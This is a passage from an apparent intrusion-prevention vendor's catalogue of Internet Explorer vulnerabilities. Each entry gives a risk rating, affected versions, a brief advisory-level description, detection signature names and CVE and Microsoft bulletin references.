File-Text_Internet-Explorer-7-Navigation-Canceled-Page-Cross-Site-Scripting
References:
CVE-2007-1499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1499
BID-22966
http://www.securityfocus.com/bid/22966
OSVDB-35352
http://www.osvdb.org/35352
MS07-033
http://technet.microsoft.com/security/bulletin/MS07-033
Back to top

Internet-Explorer-And-HTTP-Services-Authentication-Reflection-Code-Execution

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An authentication reflection vulnerability exists in Microsoft Internet Explorer and Windows HTTP services. The flaw is due to a design weakness in the authentication challenge/response mechanism. Remote unauthenticated attackers can exploit this vulnerability by enticing a user to connect to a crafted HTTP server, and then connect back to the user's own SMB service utilizing the user's own challenge/response data. A successful exploitation can lead to arbitrary code execution within the security context of the affected user. The behaviour of the target host will depend on the SMB and/or DCE-RPC commands sent to the target after the SMB authentication is bypassed.
Situation: SMB-TCP_Internet-Explorer-Authentication-Reflection-Code-Execution
References:
CVE-2009-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0550
BID-34439
http://www.securityfocus.com/bid/34439
OSVDB-53619
http://www.osvdb.org/53619
MS09-013
http://technet.microsoft.com/security/bulletin/MS09-013
Back to top

Internet-Explorer-ASLR-Bypass-CVE-2015-0069

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0;Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Internet-Explorer-ASLR-Bypass-CVE-2015-0069
References:
CVE-2015-0069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0069
BID-72454
http://www.securityfocus.com/bid/72454
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Internet-Explorer-Cached-Objects-Zone-Bypass

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.5; Internet Explorer 6.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer that allows cached objects to bypass zone boundaries.
Situation: HTTP_SS-Internet-Explorer-Cached-Objects-Zone-Bypass
File-Text_Internet-Explorer-Cached-Objects-Zone-Bypass
References:
CVE-2002-1254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1254
BID-6028
http://www.securityfocus.com/bid/6028
MS02-066
http://technet.microsoft.com/security/bulletin/MS02-066
Back to top

Internet-Explorer-CDocument-Object-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A use-after-free vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to a use-after-free error while handling the creation and assignment of attributes to objects which are subsequently modified/destroyed. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Text_Internet-Explorer-CDocument-Object-Use-After-Free
References:
CVE-2013-3114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3114
BID-60384
http://www.securityfocus.com/bid/60384
OSVDB-94109
http://www.osvdb.org/94109
MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047
Back to top

Internet-Explorer-Chtskdic.dll-Com-Object-Instantiation-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-107-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The flaw is due to improper handling of a COM object implemented by chtskdic.dll that is not designed to work with Internet Explorer. By persuading a user to visit a malicious web site, a remote attacker may execute arbitrary code on the target system with the privileges of the currently logged on user.
Situation: HTTP_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
File-Text_Internet-Explorer-MSOE-CHTSKDIC-And-IMSKDIC-Com-Object-Vulnerability
References:
CVE-2007-0942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0942
BID-19529
http://www.securityfocus.com/bid/19529
OSVDB-34399
http://www.osvdb.org/34399
MS07-027
http://technet.microsoft.com/security/bulletin/MS07-027
Back to top

Internet-Explorer-Cross-Domain-Information-Disclosure

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0;Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0;Internet Explorer 11.0
Type: Malfunction
Description: An information disclosure vulnerability exists when Internet Explorer does not properly enforce cross-domain policies, which could allow an attacker to gain access to information in another domain or Internet Explorer zone.
Situation: HTTP_CSU-Internet-Explorer-Cross-Domain-Information-Disclosure
References:
CVE-2015-0070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0070
BID-72480
http://www.securityfocus.com/bid/72480
MS15-009
http://technet.microsoft.com/security/bulletin/MS15-009
Back to top

Internet-Explorer-CVE-2014-2795

About this vulnerability: Detected attempt to exploit Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Detected attempt to exploit Microsoft Internet Explorer
Situation: File-Text_Internet-Explorer-CVE-2014-2795
References:
CVE-2014-2795
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2795
BID-68379
http://www.securityfocus.com/bid/68379
MS14-037
http://technet.microsoft.com/security/bulletin/MS14-037
Back to top

Internet-Explorer-CVE-2014-2801

About this vulnerability: Detected attempt to exploit Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: Detected attempt to exploit Microsoft Internet Explorer
Situation: File-Text_Internet-Explorer-CVE-2014-2801
References:
CVE-2014-2801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2801
BID-68383
http://www.securityfocus.com/bid/68383
MS14-037
http://technet.microsoft.com/security/bulletin/MS14-037
Back to top

Internet-Explorer-DirectAnimation.DAUserData.Data-DoS

About this vulnerability: Internet Explorer DirectAnimation.DAUserData.Data DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Browser
Description: A vulnerability exists in Internet Explorer versions 6 that allows remote attackers to cause a denial of service by accessing the Data property of a DirectAnimation DAUserData object before it is initialized.
Situation: File-Text_Internet-Explorer-DirectAnimation.DAUserData.Data-DoS
References:
CVE-2006-3513
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3513
BID-18902
http://www.securityfocus.com/bid/18902
OSVDB-27013
http://www.osvdb.org/27013
Back to top

Internet-Explorer-DirectAnimation.StructuredGraphicsControl.SourceURL-DoS

About this vulnerability: Internet Explorer DirectAnimation.StructuredGraphicsControl.SourceURL DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Browser
Description: A vulnerability exists in Internet Explorer versions 6 that allows remote attackers to trigger a null dereference and cause a denial of service by declaring sourceURL in an unitialized DirectAnimation.StructuredGraphicsControl ActiveX object.
Situation: File-Text_Internet-Explorer-DirectAnimation.StructuredGraphicsControl.SourceURL-DoS
References:
CVE-2006-3427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3427
BID-18855
http://www.securityfocus.com/bid/18855
OSVDB-26839
http://www.osvdb.org/26839
Back to top

Internet-Explorer-Directory-Traversal-Privilege-Escalation-CVE-2015-0016

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-624-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A vulnerability in Microsoft Internet Explorer
Situation: File-Text_Internet-Explorer-Directory-Traversal-Privilege-Escalation-CVE-2015-0016
References:
CVE-2015-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0016
MS15-004
http://technet.microsoft.com/security/bulletin/MS15-004
Back to top

Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles uninitialized or removed objects. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user.
Situation: HTTP_SS-Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption
File-Text_Internet-Explorer-DOM-Object-Cache-Management-Memory-Corruption
References:
CVE-2007-5344
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5344
BID-26817
http://www.securityfocus.com/bid/26817
MS07-069
http://technet.microsoft.com/security/bulletin/MS07-069
Back to top

Internet-Explorer-Domain-Url-Spoofing

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: A URL spoofing vulnerability in Internet Explorer
Situation: HTTP_CSU-Internet-Explorer-Domain-Url-Spoofing
References:
CVE-2003-1025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1025
BID-9182
http://www.securityfocus.com/bid/9182
MS04-004
http://technet.microsoft.com/security/bulletin/MS04-004
Back to top

Internet-Explorer-File-Name-Spoofing

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: A vulnerability in Microsoft Internet Explorer will allows users to be deceived into opening a file of a different type than indicated by the file extension. Embedding a CLSID as well as the character '%2E' in a file name could deceive users into thinking a file is of a legitimate type and open it, allowing a malicious file to execute.
Situation: HTTP_SHS-Internet-Explorer-File-Name-Spoofing
Back to top

Internet-Explorer-getElementById-JavaScript-For-Loop-DoS

About this vulnerability: Internet Explorer getElementById JavaScript For Loop DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Browser
Description: A vulnerability exists in Internet Explorer 6 that allows remote attackers to trigger a denial of service by using an HTML JavaScript FOR loop with an empty body, while using the getElementById object.
Situation: File-Text_Internet-Explorer-getElementById-JavaScript-For-Loop-DoS
References:
CVE-2007-0811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0811
BID-22408
http://www.securityfocus.com/bid/22408
OSVDB-37636
http://www.osvdb.org/37636
Back to top

Internet-Explorer-HtmlDlgSafeHelper-Fonts-DoS

About this vulnerability: Internet Explorer HtmlDlgSafeHelper Fonts DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Browser
Description: A vulnerability exists in Internet Explorer 6 that allows remote attackers to trigger a denial of service by setting the fonts property of the HtmlDlgSafeHelper ActiveX object.
Situation: File-Text_Internet-Explorer-HtmlDlgSafeHelper-Fonts-DoS
References:
CVE-2006-3511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3511
BID-18929
http://www.securityfocus.com/bid/18929
OSVDB-27055
http://www.osvdb.org/27055
Back to top

Internet-Explorer-Information-Disclosure-Vulnerability-CVE-2016-3261

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 11.0
Type: Input Validation
Description: There exists an information disclosure vulnerability in Internet Explorer.
Situation: File-Text_Internet-Explorer-Information-Disclosure-Vulnerability-CVE-2016-3261
References:
CVE-2016-3261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3261
MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084
Back to top

Internet-Explorer-Insecure-Library-Loading-CVE-2011-2019

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Risk: Moderate
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Situation: HTTP_CSU-Internet-Explorer-Insecure-Library-Loading-CVE-2011-2019
References:
CVE-2011-2019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2019
MS11-099
http://technet.microsoft.com/security/bulletin/MS11-099
Back to top

Internet-Explorer-JPEG-Rendering-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Internet Explorer JPEG rendering
Risk: Moderate
First detected in: sgpkg-ips-34-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: Internet Explorer has a vulnerability in the JPEG image rendering that causes memory corruption. It may be possible for a remote attacker to exploit this vulnerability to execute arbitrary code on the victim machine.
Situation: HTTP_Internet-Explorer-JPEG-Rendering-Memory-Corruption
E-Mail_BS-Internet-Explorer-JPEG-Rendering-Memory-Corruption
File-JPEG_Internet-Explorer-JPEG-Rendering-Memory-Corruption
References:
CVE-2005-1988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1988
BID-14282
http://www.securityfocus.com/bid/14282
MS05-038
http://technet.microsoft.com/security/bulletin/MS05-038
Back to top

Internet-Explorer-Long-Hostname-Memory-Corruption-Buffer-Overflow

About this vulnerability: Internet Explorer Long Hostname Memory Corruption Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-671-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: A vulnerability exists in Internet Explorer, versions 5.01, 5.5, and 6, which allows remote attackers to cause a denial of service condition or possibly execute arbitrary code via a long hostname link withing the HTML code.
Situation: File-Text_Internet-Explorer-Long-Hostname-Memory-Corruption-Buffer-Overflow
References:
CVE-2005-0554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0554
BID-13123
http://www.securityfocus.com/bid/13123
OSVDB-15464
http://www.osvdb.org/15464
MS05-020
http://technet.microsoft.com/security/bulletin/MS05-020
Back to top

Internet-Explorer-Malformed-Gif-File-Double-Free

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A double free vulnerability exists in the way Microsoft Internet Explorer handles images of the GIF file format. This vulnerability can be exploited by enticing a user to view a web page or email message containing a specially crafted .gif file. Successful exploitation can lead to a client compromise and possible remote code execution.
Situation: File-GIF_Internet-Explorer-Malformed-Gif-File-Double-Free
References:
CVE-2003-1048
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1048
BID-8530
http://www.securityfocus.com/bid/8530
MS04-025
http://technet.microsoft.com/security/bulletin/MS04-025
Back to top

Internet-Explorer-Memory-Corruption-CVE-2018-0870

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Input Validation
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code in the context of the current user.
Situation: File-Text_UTF-8-Title-In-HTML
References:
CVE-2018-0870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0870
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Internet-Explorer-Memory-Corruption-CVE-2018-0988

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-1057-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Input Validation
Description: There exists a memory corruption vulnerability in the scripting engine in Microsoft Internet Explorer. A succesful exploit could lead to remote code execution in the security context of the current user.
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-0988
References:
CVE-2018-0988
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0988
ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr
Back to top

Internet-Explorer-Memory-Corruption-CVE-2018-8249

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-TextId_Internet-Explorer-Memory-Corruption-CVE-2018-8249
References:
CVE-2018-8249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8249
ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun
Back to top

Internet-Explorer-Memory-Corruption-CVE-2018-8267

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8267
References:
CVE-2018-8267
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8267
ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun
Back to top

Internet-Explorer-Memory-Corruption-CVE-2018-8447

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists an out of bound vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8447
References:
CVE-2018-8447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8447
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Internet-Explorer-Memory-Corruption-CVE-2018-8461

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1101-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8461
References:
CVE-2018-8461
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8461
ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2015-0099

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an out-of-bounds access error during keyframe creation when processing CSS and HTML code. A remote, unauthenticated attacker could exploit the vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2015-0099
References:
CVE-2015-0099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0099
BID-72925
http://www.securityfocus.com/bid/72925
MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0063

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0063
References:
CVE-2016-0063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0063
MS16-009
http://technet.microsoft.com/security/bulletin/MS16-009
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0113

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: A memory corruption vulnerability exists in Internet Explorer.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0113
References:
CVE-2016-0113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0113
MS16-023
http://technet.microsoft.com/security/bulletin/MS16-023
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0164

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: A memory corruption vulnerability exists in Internet Explorer.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0164
References:
CVE-2016-0164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0164
MS16-037
http://technet.microsoft.com/security/bulletin/MS16-037
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0200

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-770-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-0200
References:
CVE-2016-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0200
MS16-063
http://technet.microsoft.com/security/bulletin/MS16-063
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3240

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There exists a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3240
References:
CVE-2016-3240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3240
MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3241

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There exists a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3241
References:
CVE-2016-3241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3241
MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3242

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There exists a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3242
References:
CVE-2016-3242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3242
MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3259

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-777-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There exists a memory corruption vulnerability in Internet Explorer.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2016-3259
References:
CVE-2016-3259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3259
MS16-084
http://technet.microsoft.com/security/bulletin/MS16-084
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8460

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8460
References:
CVE-2018-8460
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8460
ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct
Back to top

Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8491

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Use-after-free
Description: There exists a use-after-free vulnerability in Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: File-Text_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2018-8491
References:
CVE-2018-8491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8491
ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct
Back to top

Internet-Explorer-MSHTML-CSS-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in CSS file handling in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Buffer Overflow
Description: Microsoft Internet Explorer has a buffer overflow vulnerability in the handling of CSS files. A remote attacker can host a Web site that contains malformed CSS file. If user visits this site with a vulnerable browser, it is possible that the attacker gets unauthorized access to the user's computer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-MSHTML-CSS-Buffer-Overflow
File-Text_Internet-Explorer-MSHTML-CSS-Buffer-Overflow
References:
BID-12765
http://www.securityfocus.com/bid/12765
Back to top

Internet-Explorer-MSHTML.DLL-Parsing-DoS

About this vulnerability: Internet Explorer MSHTML.DLL Parsing DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-671-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Browser
Description: A vulnerability exists in Internet Explorer 6, in its inability to handle exceptional conditions, that allows remote attackers to trigger a denial of service condition by using malformatted HTML code.
Situation: File-Text_Internet-Explorer-MSHTML.DLL-Parsing-DoS
References:
BID-16079
http://www.securityfocus.com/bid/16079
Back to top

Internet-Explorer-OutlookExpress.AddressBook-DoS

About this vulnerability: Internet Explorer OutlookExpress.AddressBook DoS vulnerability.
Risk: High
First detected in: sgpkg-ips-671-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Browser
Description: A vulnerability exists in Internet Explorer 6 which allows remote attackers to cause a denial of service condition by creating a OutlookExpress.AddressBook COM object, which is invalid for Internet Explorer.
Situation: File-Text_Internet-Explorer-OutlookExpress.AddressBook-DoS
References:
CVE-2005-4840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4840
OSVDB-26836
http://www.osvdb.org/26836
Back to top

Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1661-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Malfunction
Description: There exists a type confusion vulnerability in Microsoft Internet Explorer. A successful exploitation could lead to remote code execution.
Situation: File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594
File-TextId_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8594
References:
CVE-2017-8594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8594
ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul
Back to top

Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8618

About this vulnerability: A vulnerability in Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0
Type: Malfunction
Description: There exists an out of bounds vulnerability in Microsoft Internet Explorer. A successful exploitation can allow a remote attacker to execute arbitrary code on the affected system.
Situation: File-Text_Internet-Explorer-Remote-Code-Execution-Vulnerability-CVE-2017-8618
References:
CVE-2017-8618
